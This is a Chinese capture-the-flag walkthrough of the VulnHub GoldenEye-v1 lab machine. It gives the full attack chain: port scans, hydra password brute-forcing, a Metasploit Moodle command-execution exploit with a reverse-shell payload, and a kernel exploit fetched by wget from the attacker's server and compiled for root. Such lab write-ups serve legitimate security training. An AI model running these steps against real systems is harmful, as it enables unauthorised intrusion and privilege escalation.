vulnhub靶机：GoldenEye-v1

扫描挖掘本地的IP地址信息：

nmap -sT 192.168.111.101

发现开放了25,80端口

访问http://192.168.111.101:80

提示可以访问/sev-home/ ,访问后让我们输入账号密码，查看页面原代码 访问/terminal.js

提示账号Boris，Natalya和密码，将密码进行解码，登录/sev-home/

得到提示：is very effective, we have configured our pop3 service to run on a very high non-default port
使用nmap探测端口
nmap -p- 192.168.111.101 -T4

nmap -sS -sV -T4 -A -p55006,55007 192.168.111.101

这段信息看出这两个端口开放了pop3的mail服务的，通过/terminal.js页面，在注释中发现一条内容，指出目标系统正在使用默认密码。
我们已知账号，通过hydra爆破，账号为Boris，Natalya，写在uname.txt文件夹
hydra -L uname.txt -P /usr/share/wordlists/fasttrack.txt -s 192.168.111.101:55007 pop3

用户：boris 密码：secret1!
用户：natalya 密码：bird
通过NC登录pop3查看邮件信封内容枚举：

查看前三个邮件



第二封来自用户“natalya”，称她可以破坏鲍里斯的密码。
第三封邮件可以看出有一份文件用了GoldenEye的访问代码作为附件进行发送，并保留在根目录中。但我们无法从此处阅读附件。
继续登录natalva账号查看邮件


两封邮件：第一封邮件：
娜塔莉亚，请你停止破解鲍里斯的密码。 此外，您是 GNO 培训主管。 一旦学生被指定给你，我就会给你发电子邮件。
此外，请注意可能的网络漏洞。 我们获悉，一个名为 Janus 的犯罪集团正在追捕 GoldenEye。

第二封邮件：
好的 Natalyn 我有一个新学生给你。 由于这是一个新系统，如果您看到任何配置问题，请告诉我或鲍里斯，尤其是它与安全有关的问题……即使不是，也只需以“安全”为幌子输入……它就会 轻松升级变更单:)
好的，用户信用是：
用户名：xenia
密码：RCP90rulez！
鲍里斯验证了她是一个有效的承包商，所以只需创建帐户好吗？
如果您没有外部内部域的 URL：severnaya-station.com/gnocertdir
**请务必编辑您的主机文件，因为您通常在远程离线工作....
由于您是 Linux 用户，因此只需将此服务器 IP 指向 /etc/hosts 中的 severnaya-station.com。

我们来设置本地hosts文件
nano /etc/hosts

进行修改

访问severnaya-station.com/gnocertdir地址：

点击：Intro to GoldenEye可以进行登录，使用natalya邮箱第二封邮件获得的用户名密码登录：

登录成功！
Home / ▶ My profile / ▶ Messages --->发现有一封邮件，内容发现用户名doak

爆破用户名doak的邮件
hydra -L uname.txt -P /usr/share/wordlists/fasttrack.txt 192.168.111.101 -s 55007 pop3

得到密码，继续使用nc登录pop3，访问邮件，得到信息：

邮件消息说，为我们提供了更多登录凭据以登录到应用程序。让我们尝试使用这些凭据登录。
用户名：dr_doak
密码：4England!

使用新账号登录cms：

登录成功，在：Home / ▶ My home 右边发现： s3cret.txt 另外发现这是Moodle使用的2.2.3版本


访问severnaya-station.com/dir007key/for-007.jpg

下载到本地：
wget http://severnaya-station.com/dir007key/for-007.jpg

根据邮件提示让我们检查图片内容，下载图片后，我们可以使用：
binwalk（路由逆向分析工具）
exiftool（图虫）
strings（识别动态库版本指令）
等查看jpg文件底层内容！

base64解码

线索中说，这是管理员的密码，通过admin账号登录cms

登录成功，可以搜索此版本的漏洞，我使用rce进行利用
使用msf

msfconsole ---进入MSF框架攻击界面
search moodle ---查找 moodle类型 攻击的模块
use 1 ---调用0 exploit/multi/http/moodle_cmd_exec调用攻击脚本
set username admin ---设置用户名：admin
set password xWinter1995x! ---设置密码：xWinter1995x!
set rhost severnaya-station.com ---设置：rhosts severnaya-station.com
set targeturi /gnocertdir ---设置目录： /gnocertdir
set payload cmd/unix/reverse ---设置payload：cmd/unix/reverse
set lhost 192.168.4.231 ---设置：lhost 192.168.4.231（需要本地IP）
exploit ----执行命令

成功拿下shell

进行内核提权：
uname -a

searchsploit 3.13

cp /usr/share/exploitdb/exploits/linux/local/37292.c 1.c

无法进行GCC编译，需要改下脚本为cc
gedit 1.c / nano 1.c ---文本打开
第143行将gcc改为cc ---编写下
然后在本目录下开启服务器：
python -m http.server 8081
反弹shell中执行wget http://192.168.111.25/1.c

cc 1.c shell

chmod 777 shell
./shell
whoami
cd /root

打完收工